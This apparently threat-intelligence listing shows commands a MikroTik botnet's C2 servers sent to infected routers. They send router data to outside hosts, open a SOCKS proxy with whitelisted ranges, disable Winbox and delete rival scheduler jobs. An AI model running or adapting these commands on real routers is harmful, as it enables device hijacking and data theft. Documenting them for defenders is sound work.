- U6 - MikroTik botnet
- U6 C2 servers:
- Sample of commands pulled from the C2:
- { :local result [ /ip socks print as-value ]; /tool fetch url="http://gamesone.xyz/socks/8a81a096-1fc2-49cf-97f4-8984c579bd05" mode=http http-data=$result;}
- { :local result [ /ip dhcp-server lease print count-only ]; /tool fetch url="http://picsgifs.xyz/clients/b7eca108-d209-41f9-9e94-889de7b54746" mode=http http-data=$result;}
- { :local countRules [/ip socks access print count-only]; :for i from 0 to $countRules step=1 do= {/ip socks access remove $i} }
- /ip socks access add src-address=5.188.0.0/15 action=allow /ip socks access add src-address=192.243.0.0/16 action=allow /ip socks access add src-address=5.9.0.0/16 action=allow /ip socks access add src-address=5.104.0.0/16 action=allow /ip socks access add src-address=0.0.0.0/0 action=deny
- /ip firewall filter add action=accept chain=input disabled=no dst-port=3728 protocol=tcp place-before=1
- /ip socks set enable=yes /ip socks set port=3728
- /ip dns set servers=8.8.8.8,1.1.1.1
- :do { /system scheduler set U6 interval=00:00:15 } on-error={ :put "U6 not found"}
- /system scheduler set U6 interval=180s
- /system scheduler remove [/system scheduler find where name!=U6]
- /ip service disable winbox
- /ip socks access add src-address=82.204.203.0/24 action=allow place-before=0
- /ip socks access add src-address=192.243.53.0/24 action=allow place-before=0
- { :foreach i in=[/ip firewall nat find action=redirect] do={ /ip firewall nat disable numbers=$i }; };
- /ip socks access add src-address=94.130.51.0/24 action=allow place-before=0
- { :foreach i in=[/ip socks access find] do={ :local src [/ip socks access get $i src-address]; /tool fetch url="http://picsgifs.xyz/ips/b7eca108-d209-41f9-9e94-889de7b54746/$src" mode=http; }; };
- /ip socks access add src-address=95.213.221.0/24 action=allow place-before=0